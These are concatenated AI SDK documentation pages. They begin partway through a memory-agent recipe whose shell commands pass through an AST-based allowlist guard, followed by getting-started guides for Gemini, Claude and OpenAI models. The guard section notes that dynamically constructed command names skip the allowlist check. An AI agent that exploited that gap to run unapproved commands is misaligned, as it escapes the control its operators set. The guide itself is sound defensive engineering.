The safety pipeline has two layers: the AST-based command guard rejects unapproved commands before they reach the interpreter, and just-bash itself is a JavaScript-based bash implementation (it does not spawn a real shell process). While the bash interpreter runs in JavaScript, the filesystem is real and commands read and write actual files on disk. This is why the command guard is critical.

The rest of this recipe (agent wiring, prepareCall, and run loop) works for either route.

Step 2: Create the Agent

Wire everything together with ToolLoopAgent. The prepareCall hook reads core memory fresh before every LLM call and injects it into the system prompt:

import { ToolLoopAgent } from 'ai';

const today = new Date().toISOString().slice(0, 10);

const memoryAgent = new ToolLoopAgent({
  model: 'anthropic/claude-haiku-4.5',
  tools: { memory: memoryTool },
  prepareCall: async settings => {
    // user-defined function fetches the contents of /.memory/core.md on every turn
    const coreMemory = await readCoreMemory();
    return {
      ...settings,
      instructions: `Today's date is ${today}.

Core memory:
${coreMemory}

You can save and recall important information using the memory tool.`,
    };
  },
});

Because prepareCall runs before each generate call in the tool loop, the system prompt always reflects the latest state of core.md. If the model updates core memory during a conversation, the next loop iteration sees the change immediately.

Step 3: Run the Agent

Bootstrap the filesystem, record conversations, and run the agent:

const prompt = 'Remember that my favorite editor is Neovim';

// Record the user message
await appendConversation({
  role: 'user',
  content: prompt,
  timestamp: new Date().toISOString(),
});

// Run the agent (loops automatically on tool calls)
const result = await memoryAgent.generate({ prompt });

// Record the assistant response
await appendConversation({
  role: 'assistant',
  content: result.text,
  timestamp: new Date().toISOString(),
});

console.log(result.text);

When the model decides it needs to store or recall information, it calls the memory tool. The ToolLoopAgent executes the tool and feeds the result back, continuing until the model produces a final text response.

A typical interaction looks like this:

User says "Remember that my favorite editor is Neovim"
The model calls memory with echo "- Favorite editor: Neovim" >> /.memory/core.md
The tool executes the command and returns the result
The model responds: "Got it, I've saved that your favorite editor is Neovim."
On the next run, prepareCall reads core.md and the fact appears in the system prompt

Learn More

AI SDK documentation for ToolLoopAgent, tool, and generateText
just-bash for the JavaScript-based bash interpreter and AST parser
AI SDK examples for more agent patterns

Appendix: Implementation Details

The code below is the reference implementation for the infrastructure described in Implementation Requirements. It uses Node.js filesystem APIs and a Bun entrypoint, but you can port the patterns to any runtime.

Appendix: Filesystem Bootstrap

Define the memory directory structure and bootstrap it on startup. Each file gets reasonable defaults if it does not already exist:

import {
  access,
  appendFile,
  mkdir,
  readFile,
  writeFile,
} from 'node:fs/promises';
import { join, resolve } from 'node:path';

const MEMORY_DIR = '.memory';
const MEMORY_ROOT = resolve(process.cwd(), MEMORY_DIR);
const CORE_MEMORY_PATH = join(MEMORY_ROOT, 'core.md');
const NOTES_PATH = join(MEMORY_ROOT, 'notes.md');
const CONVERSATIONS_PATH = join(MEMORY_ROOT, 'conversations.jsonl');

const DEFAULT_CORE_MEMORY = `# Core Memory
- Keep this short.
- Put stable user facts here.
`;

const DEFAULT_NOTES = `# Notes
Use this file for detailed memories and timestamped notes.
`;

async function ensureFile(path: string, content: string): Promise<void> {
  try {
    await access(path);
  } catch {
    await writeFile(path, content, 'utf8');
  }
}

async function ensureMemoryFilesystem(): Promise<void> {
  await mkdir(MEMORY_ROOT, { recursive: true });
  await ensureFile(CORE_MEMORY_PATH, DEFAULT_CORE_MEMORY);
  await ensureFile(NOTES_PATH, DEFAULT_NOTES);
  await ensureFile(CONVERSATIONS_PATH, '');
}

Add .memory to your .gitignore to keep memory local and private.

Appendix: Helper Functions

One helper reads core memory for system prompt injection, the other appends conversation entries as JSONL:

async function readCoreMemory(): Promise<string> {
  try {
    return await readFile(CORE_MEMORY_PATH, 'utf8');
  } catch {
    return '';
  }
}

async function appendConversation(entry: {
  role: 'user' | 'assistant';
  content: string;
  timestamp: string;
}): Promise<void> {
  await appendFile(CONVERSATIONS_PATH, `${JSON.stringify(entry)}\n`, 'utf8');
}

Appendix: Structured Actions Handler

The runMemoryCommand function used in Route A maps each action to a filesystem operation. Paths are resolved relative to the memory root, and only known memory files are allowed:

import { readFile, writeFile, appendFile } from 'node:fs/promises';
import { join, relative } from 'node:path';

const MEMORY_FILES = ['core.md', 'notes.md', 'conversations.jsonl'];

function resolveMemoryPath(path: string): string {
  const relativePath = path
    .trim()
    .replace(/^\/?memories\/?/, '')
    .replace(/^\/?\.memory\/?/, '')
    .replace(/^\/+/, '');

  if (!MEMORY_FILES.includes(relativePath)) {
    throw new Error(`Unsupported memory path: ${path}`);
  }

  return join(MEMORY_ROOT, relativePath);
}

async function runMemoryCommand(input: {
  command: 'view' | 'create' | 'update' | 'search';
  path?: string;
  content?: string;
  mode?: 'append' | 'overwrite';
  query?: string;
}): Promise<string> {
  const { command, path, content, mode, query } = input;

  switch (command) {
    case 'view': {
      if (!path) throw new Error('path is required for view');
      return await readFile(resolveMemoryPath(path), 'utf8');
    }
    case 'create':
    case 'update': {
      if (!path) throw new Error('path is required');
      if (!content) throw new Error('content is required');
      const target = resolveMemoryPath(path);
      if (mode === 'append') {
        await appendFile(target, content, 'utf8');
      } else {
        await writeFile(target, content, 'utf8');
      }
      return `${command === 'create' ? 'Created' : 'Updated'} ${path}`;
    }
    case 'search': {
      if (!query) throw new Error('query is required for search');
      const terms = query.toLowerCase().split(/\s+/).filter(Boolean);
      const files = path
        ? [resolveMemoryPath(path)]
        : MEMORY_FILES.map(f => join(MEMORY_ROOT, f));
      const matches: string[] = [];

      for (const filePath of files) {
        const lines = (await readFile(filePath, 'utf8')).split('\n');
        for (const [i, line] of lines.entries()) {
          const lower = line.toLowerCase();
          if (terms.some(t => lower.includes(t))) {
            matches.push(`${relative(MEMORY_ROOT, filePath)}:${i + 1}:${line}`);
          }
        }
      }

      return matches.length > 0 ? matches.join('\n') : 'No matches found.';
    }
  }
}

Appendix: Command Guard

The AST-based command guard walks every node in the parsed command (including pipelines, subshells, loops, and conditionals) and rejects anything not in the allowlist. This is more robust than string matching or regex. If a command name is dynamically constructed (e.g., via variable expansion), extractLiteralWord returns null and the guard skips the allowlist check for that command. Since just-bash is a JavaScript-based interpreter (not a real shell), dynamically constructed commands that bypass the allowlist check fail to resolve to real binaries. This is an acceptable tradeoff.

import {
  type CommandNode,
  parse,
  type ScriptNode,
  type WordNode,
} from 'just-bash';

const approvedCommands = new Set([
  'cat',
  'echo',
  'grep',
  'jq',
  'ls',
  'mkdir',
  'perl',
  'sed',
  'tail',
]);

function extractLiteralWord(word: WordNode | null): string | null {
  if (!word || word.parts.length !== 1) return null;
  const [part] = word.parts;
  if (!part || part.type !== 'Literal') return null;
  return part.value;
}

function collectCommandNames(script: ScriptNode): string[] {
  const names = new Set<string>();

  const visitCommand = (command: CommandNode): void => {
    switch (command.type) {
      case 'SimpleCommand': {
        const name = extractLiteralWord(command.name);
        if (name) names.add(name);
        break;
      }
      case 'If': {
        for (const clause of command.clauses) {
          for (const s of clause.condition) visitStatement(s);
          for (const s of clause.body) visitStatement(s);
        }
        if (command.elseBody) {
          for (const s of command.elseBody) visitStatement(s);
        }
        break;
      }
      case 'For':
      case 'CStyleFor':
      case 'While':
      case 'Until':
      case 'Subshell':
      case 'Group': {
        for (const s of command.body) visitStatement(s);
        break;
      }
      case 'Case': {
        for (const item of command.items) {
          for (const s of item.body) visitStatement(s);
        }
        break;
      }
      case 'FunctionDef': {
        visitCommand(command.body);
        break;
      }
      case 'ArithmeticCommand':
      case 'ConditionalCommand':
        break;
    }
  };

  const visitStatement = (
    statement: ScriptNode['statements'][number],
  ): void => {
    for (const pipeline of statement.pipelines) {
      for (const command of pipeline.commands) {
        visitCommand(command);
      }
    }
  };

  for (const statement of script.statements) {
    visitStatement(statement);
  }

  return [...names].sort();
}

export function findUnapprovedCommand(commandLine: string): string | null {
  let script: ScriptNode;
  try {
    script = parse(commandLine);
  } catch {
    return null;
  }
  const commandNames = collectCommandNames(script);
  return commandNames.find(name => !approvedCommands.has(name)) ?? null;
}

title: Get started with Gemini 3 description: Get started with Gemini 3 using the AI SDK. tags: ['getting-started']

Get started with Gemini 3

Gemini 3

Gemini 3 represents a significant leap forward in AI capabilities, combining all of Gemini's strengths together to help you bring any idea to life. It delivers:

State-of-the-art reasoning with unprecedented depth and nuance
PhD-level performance on complex benchmarks like Humanity's Last Exam (37.5%) and GPQA Diamond (91.9%)
Leading multimodal understanding with 81% on MMMU-Pro and 87.6% on Video-MMMU
Best-in-class vibe coding and agentic capabilities
Superior long-horizon planning for multi-step workflows

Gemini 3 Pro is currently available in preview, offering great performance across all benchmarks.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Gemini 3 with the AI SDK:

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text } = await generateText({
  model: google('gemini-3-pro-preview'),
  prompt: 'Explain the concept of the Hilbert space.',
});
console.log(text);

Enhanced Reasoning with Thinking Mode

Gemini 3 models can use enhanced reasoning through thinking mode, which improves their ability to solve complex problems. You can control the thinking level using the thinkingLevel provider option:

import { google, GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text } = await generateText({
  model: google('gemini-3-pro-preview'),
  prompt: 'What is the sum of the first 10 prime numbers?',
  providerOptions: {
    google: {
      thinkingConfig: {
        includeThoughts: true,
        thinkingLevel: 'low',
      },
    } satisfies GoogleLanguageModelOptions,
  },
});

console.log(text);

The thinkingLevel parameter accepts different values to control the depth of reasoning applied to your prompt:

Gemini 3 Pro supports: 'low' and 'high'
Gemini 3 Flash supports: 'minimal', 'low', 'medium', and 'high'

Using Tools with the AI SDK

Gemini 3 excels at tool calling with improved reliability and consistency for multi-step workflows. Here's an example of using tool calling with the AI SDK:

import { z } from 'zod';
import { generateText, tool, stepCountIs } from 'ai';
import { google } from '@ai-sdk/google';

const result = await generateText({
  model: google('gemini-3-pro-preview'),
  prompt: 'What is the weather in San Francisco?',
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  stopWhen: stepCountIs(5), // enables multi-step calling
});

console.log(result.text);

console.log(result.steps);

Using Google Search with Gemini

With search grounding, Gemini can access the latest information using Google search. Here's an example of using Google Search with the AI SDK:

import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources, providerMetadata } = await generateText({
  model: google('gemini-3-pro-preview'),
  tools: {
    google_search: google.tools.googleSearch({}),
  },
  prompt:
    'List the top 5 San Francisco news from the past week.' +
    'You must include the date of each article.',
});

// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
  | GoogleGenerativeAIProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;

console.log({ text, sources, groundingMetadata, safetyRatings });

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, and streamed JSON into your app.

Let's explore building a chatbot with Next.js, the AI SDK, and Gemini 3 Pro:

In a new Next.js application, first install the AI SDK and the Google Generative AI provider:

Then, create a route handler for the chat endpoint:

import { google } from '@ai-sdk/google';
import { streamText, UIMessage, convertToModelMessages } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: google('gemini-3-pro-preview'),
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();
  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      {messages.map(message => (
        <div key={message.id} className="whitespace-pre-wrap">
          {message.role === 'user' ? 'User: ' : 'Gemini: '}
          {message.parts.map((part, i) => {
            switch (part.type) {
              case 'text':
                return <div key={`${message.id}-${i}`}>{part.text}</div>;
            }
          })}
        </div>
      ))}

      <form
        onSubmit={e => {
          e.preventDefault();
          sendMessage({ text: input });
          setInput('');
        }}
      >
        <input
          className="fixed dark:bg-zinc-900 bottom-0 w-full max-w-md p-2 mb-8 border border-zinc-300 dark:border-zinc-800 rounded shadow-xl"
          value={input}
          placeholder="Say something..."
          onChange={e => setInput(e.currentTarget.value)}
        />
      </form>
    </div>
  );
}

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
Read more about the Google Generative AI provider.

title: Get started with Claude 4 description: Get started with Claude 4 using the AI SDK. tags: ['getting-started']

Get started with Claude 4

With the release of Claude 4, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities and advanced intelligence.

Claude 4

Prompt Engineering for Claude 4 Models

Claude 4 models respond well to clear, explicit instructions. The following best practices can help achieve optimal performance:

Provide explicit instructions: Clearly state what you want the model to do, including specific steps or formats for the response.
Include context and motivation: Explain why a task is being performed to help the model better understand the underlying goals.
Avoid negative examples: When providing examples, only demonstrate the behavior you want to see, not what you want to avoid.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Claude 4 Sonnet with the AI SDK:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-sonnet-4-20250514'),
  prompt: 'How will quantum computing impact cryptography by 2050?',
});
console.log(text);

Reasoning Ability

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-sonnet-4-20250514'),
  prompt: 'How will quantum computing impact cryptography by 2050?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 15000 },
    } satisfies AnthropicLanguageModelOptions,
  },
  headers: {
    'anthropic-beta': 'interleaved-thinking-2025-05-14',
  },
});

console.log(text); // text response
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, and streamed JSON into your app.

Let's explore building a chatbot with Next.js, the AI SDK, and Claude Sonnet 4:

In a new Next.js application, first install the AI SDK and the Anthropic provider:

Then, create a route handler for the chat endpoint:

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { streamText, convertToModelMessages, type UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: anthropic('claude-sonnet-4-20250514'),
    messages: await convertToModelMessages(messages),
    headers: {
      'anthropic-beta': 'interleaved-thinking-2025-05-14',
    },
    providerOptions: {
      anthropic: {
        thinking: { type: 'enabled', budgetTokens: 15000 },
      } satisfies AnthropicLanguageModelOptions,
    },
  });

  return result.toUIMessageStreamResponse({
    sendReasoning: true,
  });
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat({
    transport: new DefaultChatTransport({ api: '/api/chat' }),
  });

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    if (input.trim()) {
      sendMessage({ text: input });
      setInput('');
    }
  };

  return (
    <div className="flex flex-col h-screen max-w-2xl mx-auto p-4">
      <div className="flex-1 overflow-y-auto space-y-4 mb-4">
        {messages.map(message => (
          <div
            key={message.id}
            className={`p-3 rounded-lg ${
              message.role === 'user' ? 'bg-blue-50 ml-auto' : 'bg-gray-50'
            }`}
          >
            <p className="font-semibold">
              {message.role === 'user' ? 'You' : 'Claude 4'}
            </p>
            {message.parts.map((part, index) => {
              if (part.type === 'text') {
                return (
                  <div key={index} className="mt-1">
                    {part.text}
                  </div>
                );
              }
              if (part.type === 'reasoning') {
                return (
                  <pre
                    key={index}
                    className="bg-gray-100 p-2 rounded mt-2 text-xs overflow-x-auto"
                  >
                    <details>
                      <summary className="cursor-pointer">
                        View reasoning
                      </summary>
                      {part.text}
                    </details>
                  </pre>
                );
              }
            })}
          </div>
        ))}
      </div>
      <form onSubmit={handleSubmit} className="flex gap-2">
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
          className="flex-1 p-2 border rounded focus:outline-none focus:ring-2 focus:ring-blue-500"
          placeholder="Ask Claude 4 something..."
        />
        <button
          type="submit"
          className="bg-blue-500 text-white px-4 py-2 rounded hover:bg-blue-600"
        >
          Send
        </button>
      </form>
    </div>
  );
}

Claude 4 Model Variants

Claude 4 is available in two variants, each optimized for different use cases:

Claude Sonnet 4: Balanced performance suitable for most enterprise applications, with significant improvements over Sonnet 3.7.
Claude Opus 4: Anthropic's most powerful model and the best coding model available. Excels at sustained performance on long-running tasks that require focused effort and thousands of steps, with the ability to work continuously for several hours.

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: OpenAI Responses API description: Get started with the OpenAI Responses API using the AI SDK. tags: ['getting-started', 'agents']

Get started with OpenAI Responses API

With the release of OpenAI's responses API, there has never been a better time to start building AI applications, particularly those that require a deeper understanding of the world.

The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.

OpenAI Responses API

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call GPT-4o with the new Responses API using the AI SDK:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai.responses('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
});

Generating Structured Data

While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.

import { generateText, Output } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { output } = await generateText({
  model: openai.responses('gpt-4o'),
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({ name: z.string(), amount: z.string() }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Using Tools with the AI SDK

The Responses API supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:

import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { text } = await generateText({
  model: openai.responses('gpt-4o'),
  prompt: 'What is the weather like today in San Francisco?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  stopWhen: stepCountIs(5), // enable multi-step 'agentic' LLM calls
});

Web Search Tool

The Responses API introduces a built-in tool for grounding responses called webSearch. With this tool, the model can access the internet to find relevant information for its responses.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'What happened in San Francisco last week?',
  tools: {
    web_search_preview: openai.tools.webSearchPreview(),
  },
});

console.log(result.text);
console.log(result.sources);

The webSearch tool also allows you to specify query-specific metadata that can be used to improve the quality of the search results.

import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'What happened in San Francisco last week?',
  tools: {
    web_search_preview: openai.tools.webSearchPreview({
      searchContextSize: 'high',
      userLocation: {
        type: 'approximate',
        city: 'San Francisco',
        region: 'California',
      },
    }),
  },
});

console.log(result.text);
console.log(result.sources);

MCP Tool

The Responses API also supports connecting to Model Context Protocol (MCP) servers. This allows models to call tools exposed by remote MCP servers or service connectors.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-5-mini'),
  prompt: 'Search the web for the latest NYC mayoral election results',
  tools: {
    mcp: openai.tools.mcp({
      serverLabel: 'web-search',
      serverUrl: 'https://mcp.exa.ai/mcp',
      serverDescription: 'A web-search API for AI agents',
    }),
  },
});

console.log(result.text);

For more details on configuring the MCP tool, including authentication, tool filtering, and connector support, see the OpenAI provider documentation.

Using Persistence

With the Responses API, you can persist chat history with OpenAI across requests. This allows you to send just the user's last message and OpenAI can access the entire chat history.

There are two options available to use persistence:

With previousResponseId

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result1 = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'Invent a new holiday and describe its traditions.',
});

const result2 = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'Summarize in 2 sentences',
  providerOptions: {
    openai: {
      previousResponseId: result1.providerMetadata?.openai.responseId as string,
    },
  },
});

With Conversations

You can use the Conversation API to create a conversation.

Once you have created a conversation, you can continue it:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'Summarize in 2 sentences',
  providerOptions: {
    openai: {
      // The Conversation ID created via the OpenAI API to continue
      conversation: 'conv_123',
    },
  },
});

Migrating from Completions API

Migrating from the OpenAI Completions API (via the AI SDK) to the new Responses API is simple. To migrate, simply change your provider instance from openai(modelId) to openai.responses(modelId):

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Completions API
const { text } = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
});

// Responses API
const { text } = await generateText({
  model: openai.responses('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
});

When using the Responses API, provider specific options that were previously specified on the model provider instance have now moved to the providerOptions object:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Completions API
const { text } = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
  providerOptions: {
    openai: {
      parallelToolCalls: false,
    },
  },
});

// Responses API
const { text } = await generateText({
  model: openai.responses('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
  providerOptions: {
    openai: {
      parallelToolCalls: false,
    },
  },
});

Get Started

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Google Gemini Image Generation description: Generate and edit images with Google Gemini 2.5 Flash Image using the AI SDK. tags: ['image-generation', 'google', 'gemini']

Generate and Edit Images with Google Gemini 2.5 Flash

This guide will show you how to generate and edit images with the AI SDK and Google's latest multimodal language model Gemini 2.5 Flash Image.

Generating Images

import { generateText } from 'ai';
import fs from 'node:fs';
import 'dotenv/config';

async function generateImage() {
  const result = await generateText({
    model: 'google/gemini-2.5-flash-image',
    prompt:
      'Create a picture of a nano banana dish in a fancy restaurant with a Gemini theme',
  });

  // Save generated images
  for (const file of result.files) {
    if (file.mediaType.startsWith('image/')) {
      const timestamp = Date.now();
      const fileName = `generated-${timestamp}.png`;

      fs.mkdirSync('output', { recursive: true });
      await fs.promises.writeFile(`output/${fileName}`, file.uint8Array);

      console.log(`Generated and saved image: output/${fileName}`);
    }
  }
}

generateImage().catch(console.error);

Here are some key points to remember:

Generated images are returned in the result.files array
Images are returned as Uint8Array data
The model leverages Gemini's world knowledge, so detailed prompts yield better results

Editing Images

Gemini 2.5 Flash Image excels at editing existing images with natural language instructions. You can add elements, modify styles, or transform images while maintaining their core characteristics:

import { generateText } from 'ai';
import fs from 'node:fs';
import 'dotenv/config';

async function editImage() {
  const editResult = await generateText({
    model: 'google/gemini-2.5-flash-image',
    prompt: [
      {
        role: 'user',
        content: [
          {
            type: 'text',
            text: 'Add a small wizard hat to this cat. Keep everything else the same.',
          },
          {
            type: 'image',
            // image: DataContent (string | Uint8Array | ArrayBuffer | Buffer) or URL
            image: new URL(
              'https://raw.githubusercontent.com/vercel/ai/refs/heads/main/examples/ai-functions/data/comic-cat.png',
            ),
            mediaType: 'image/jpeg',
          },
        ],
      },
    ],
  });

  // Save the edited image
  const timestamp = Date.now();
  fs.mkdirSync('output', { recursive: true });

  for (const file of editResult.files) {
    if (file.mediaType.startsWith('image/')) {
      await fs.promises.writeFile(
        `output/edited-${timestamp}.png`,
        file.uint8Array,
      );
      console.log(`Saved edited image: output/edited-${timestamp}.png`);
    }
  }
}

editImage().catch(console.error);

What's Next?

You've learned how to generate new images from text prompts and edit existing images using natural language instructions with Google's Gemini 2.5 Flash Image model.

For more advanced techniques, integration patterns, and practical examples, check out our Cookbook where you'll find comprehensive guides for building sophisticated AI-powered applications.

title: Get started with Claude 3.7 Sonnet description: Get started with Claude 3.7 Sonnet using the AI SDK. tags: ['getting-started']

Get started with Claude 3.7 Sonnet

With the release of Claude 3.7 Sonnet, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.

Claude 3.7 Sonnet

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Claude 3.7 Sonnet with the AI SDK:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-3-7-sonnet-20250219'),
  prompt: 'How many people will live in the world in 2040?',
});
console.log(text); // text response

The unified interface also means that you can easily switch between providers by changing just two lines of code. For example, to use Claude 3.7 Sonnet via Amazon Bedrock:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const { reasoning, text } = await generateText({
  model: bedrock('anthropic.claude-3-7-sonnet-20250219-v1:0'),
  prompt: 'How many people will live in the world in 2040?',
});

Reasoning Ability

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-3-7-sonnet-20250219'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
    } satisfies AnthropicLanguageModelOptions,
  },
});

console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and Claude 3.7 Sonnet:

In a new Next.js application, first install the AI SDK and the Anthropic provider:

Then, create a route handler for the chat endpoint:

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { streamText, convertToModelMessages, type UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: anthropic('claude-3-7-sonnet-20250219'),
    messages: await convertToModelMessages(messages),
    providerOptions: {
      anthropic: {
        thinking: { type: 'enabled', budgetTokens: 12000 },
      } satisfies AnthropicLanguageModelOptions,
    },
  });

  return result.toUIMessageStreamResponse({
    sendReasoning: true,
  });
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat({
    transport: new DefaultChatTransport({ api: '/api/chat' }),
  });

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    if (input.trim()) {
      sendMessage({ text: input });
      setInput('');
    }
  };

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) => {
            // text parts:
            if (part.type === 'text') {
              return <div key={index}>{part.text}</div>;
            }
            // reasoning parts:
            if (part.type === 'reasoning') {
              return <pre key={index}>{part.text}</pre>;
            }
          })}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Send</button>
      </form>
    </>
  );
}

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
